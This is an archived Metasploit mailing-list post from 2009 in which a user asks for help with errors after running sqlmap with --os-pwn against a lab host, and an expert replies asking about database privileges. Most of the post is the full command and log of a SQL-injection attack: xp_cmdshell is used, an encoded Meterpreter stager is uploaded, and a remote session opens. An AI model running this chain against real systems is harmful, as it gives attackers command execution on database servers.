Meterpreter and sqlmap?

[carlos_perez at darkoperator.com (Carlos Pérez)]

Under what privileges is the database service running under on the  
target machine?

Sent from my iPhone

On May 1, 2009, at 5:58 PM, OSMAN ELSAHIB <elsahib10 at hotmail.com> wrote:

> hello everyone, i'm getting a very weird problem when running  
> Metasploit with SQLMAP 0.7 on a Ubuntu machine ( Sun VirtualBox),  
> any ideas?
>
> === 
> ======================================================================
>
> root at osman-laptop:/home/User/Desktop/sqlmap# python sqlmap.py -u "http://192.168.0.12/test.aspx?id=3 
> " --os-pwn --msf-path=/home/osman/metasploit
>
>     sqlmap/0.7rc1
>     by Bernardo Damele A. G. <bernardo.damele at gmail.com>
>
> [*] starting at: 00:36:29
>
> [00:36:29] [INFO] testing connection to the target url
> [00:36:32] [INFO] testing if the url is stable, wait a few seconds
> [00:36:38] [INFO] url is stable
> [00:36:38] [INFO] testing if User-Agent parameter 'User-Agent' is  
> dynamic
> [00:36:45] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
> [00:36:45] [INFO] testing if Cookie parameter 'ASP.NET_SessionId' is  
> dynamic
> [00:36:52] [WARNING] Cookie parameter 'ASP.NE T_SessionId' is not  
> dynamic
> [00:36:52] [INFO] testing if GET parameter 'id' is dynamic
> [00:36:59] [INFO] confirming that GET parameter 'id' is dynamic
> [00:37:15] [INFO] GET parameter 'id' is dynamic
> [00:37:15] [INFO] testing sql injection on GET parameter 'id' with 0  
> parenthesis
> [00:37:15] [INFO] testing unescaped numeric injection on GET  
> parameter 'id'
> [00:37:29] [INFO] confirming unescaped numeric injection on GET  
> parameter 'id'
> [00:37:36] [INFO] GET parameter 'id' is unescaped numeric injectable  
> with 0 parenthesis
> [00:37:36] [INFO] testing for parenthesis on injectable parameter
> [00:38:02] [INFO] the injectable parameter requires 0 parenthesis
> [00:38:02] [INFO] testing MySQL
> [00:38:11] [WARNING] the back-end DMBS is not MySQL
> [00:38:11] [INFO] testing Oracle
> [00:38:20] [WARNING] the back-end DMBS is not Oracle
> [00:38:20] [INFO] testing PostgreSQL
> [00:38:27] [WARNING] the back-end DMBS is not PostgreSQL
> [00:38:27] [INFO] test ing Microsoft SQL Server
> [00:38:36] [INFO] confirming Microsoft SQL Server
> [00:39:01] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows 2003 or 2008
> web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET  
> 1.1.4322
> back-end DBMS: Microsoft SQL Server
>
> [00:39:01] [INFO] testing stacked queries support on parameter 'id'
> [00:39:13] [INFO] the web application supports stacked queries on  
> parameter 'id'
> [00:39:13] [INFO] testing if current user is DBA
> [00:39:13] [INFO] retrieved: 0
> [00:39:44] [WARNING] the functionality requested might not work  
> because the session user is not a database administrator
> [00:39:44] [INFO] checking if xp_cmdshell extended procedure is  
> available, wait..
> [00:39:50] [INFO] xp_cmdshell extended procedure is available
> [00:40:03] [INFO] creating Metasploit Framework 3 payload stager
> which connection type do you want to use?
> [1] Bind TCP (default)
> [2] Bind TCP (No N X)
> [3] Reverse TCP
> [4] Reverse TCP (No NX)
> > 2
> which is the back-end DBMS address? [192.168.0.12]
> which remote port numer do you want to use? [16882] 21
> which payload do you want to use?
> [1] Meterpreter (default)
> [2] Shell
> [3] VNC
> > 1
> which payload encoding do you want to use?
> [1] No Encoder
> [2] Alpha2 Alphanumeric Mixedcase Encoder
> [3] Alpha2 Alphanumeric Uppercase Encoder
> [4] Avoid UTF8/tolower
> [5] Call+4 Dword XOR Encoder
> [6] Single-byte XOR Countdown Encoder
> [7] Variable-length Fnstenv/mov Dword XOR Encoder
> [8] Polymorphic Jump/Call XOR Additive Feedback Encoder
> [9] Non-Alpha Encoder
> [10] Non-Upper Encoder
> [11] Polymorphic XOR Additive Feedback Encoder (default)
> [12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
> [13] Alpha2 Alphanumeric Unicode Uppercase Encoder
> > 11
> [00:40:23] [INFO] creation in progress ................ done
> [00:40:40] [INFO] compression in progress . done
> [00 :40:41] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/ 
> sqlmapmsfrerje.exe'
> [00:41:23] [INFO] running Metasploit Framework 3 command line  
> interface locally, wait..
> [00:41:23] [INFO] running Metasploit Framework 3 payload stager  
> remotely, wait..
> [*] Please wait while we load the module tree...
> [*] Started bind handler
> [*] Starting the payload handler...
> [*] Transmitting intermediate stager for over-sized stage...(191  
> bytes)
> [*] Sending stage (2650 bytes)
> [*] Sleeping before handling stage...
> [*] Uploading DLL (75787 bytes)...
> [*] Upload completed.
> [*] Meterpreter session 1 opened (192.168.0.4:50577 ->  
> 192.168.0.12:21)
>
> meterpreter > Loading extension priv...[-]
> failure: Interrupted system call /home/osman/metasploit/lib/rex/io/ 
> stream.rb:40:in `syswrite'
> /home/osman/metasploit/lib/rex/io/stream.rb:40:in `write'
> /home/osman/metasploit/lib/rex/post/meterpreter/packet_dispatcher.rb: 
> 59:in `send_packet'
> /home/osman/metas ploit/lib/rex/post/meterpreter/ 
> packet_dispatcher.rb:92:in `send_packet_wait_response'
> /home/osman/metasploit/lib/rex/post/meterpreter/client_core.rb: 
> 115:in `load_library'
> /home/osman/metasploit/lib/rex/post/meterpreter/client_core.rb: 
> 157:in `use'
> /home/osman/metasploit/lib/rex/post/meterpreter/ui/console/ 
> command_dispatcher/core.rb:254:in `cmd_use'
> /home/osman/metasploit/lib/rex/post/meterpreter/ui/console/ 
> command_dispatcher/core.rb:242:in `each'
> /home/osman/metasploit/lib/rex/post/meterpreter/ui/console/ 
> command_dispatcher/core.rb:242:in `cmd_use'
> /home/osman/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in  
> `send'
> /home/osman/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in  
> `run_command'
> /home/osman/metasploit/lib/rex/post/meterpreter/ui/console.rb:94:in  
> `run_command'
> /home/osman/metasploit/lib/rex/ui/text/dispatcher_shell.rb:196:in  
> `run_single'
> /home/osman/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in  
> `each'
> /home/osman/meta sploit/lib/rex/ui/text/dispatcher_shell.rb:191:in  
> `run_single'
> /home/osman/metasploit/lib/rex/post/meterpreter/ui/console.rb:60:in  
> `interact'
> /home/osman/metasploit/lib/rex/ui/text/shell.rb:123:in `call'
> /home/osman/metasploit/lib/rex/ui/text/shell.rb:123:in `run'
> /home/osman/metasploit/lib/rex/post/meterpreter/ui/console.rb:58:in  
> `interact'
> /home/osman/metasploit/lib/msf/base/sessions/meterpreter.rb:181:in  
> `_interact'
> /home/osman/metasploit/lib/rex/ui/interactive.rb:48:in `interact'
> /home/osman/metasploit/msfcli:246
> meterpreter > run winenum
> [*] Running Windows Local Enumerion Meterpreter Script
> [*] New session on 192.168.0.12:21...
> [-] Error in script: undefined method `config' for nil:NilClass
> === 
> === 
> === 
> =====================================================================
> Elsahib
>
>
>
>
>
> check out the rest of the Windows Live?. More than mail?Windows  
> Live? goes way beyond your inbox.  More than messages
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090501/c2f576ca/attachment-0001.htm>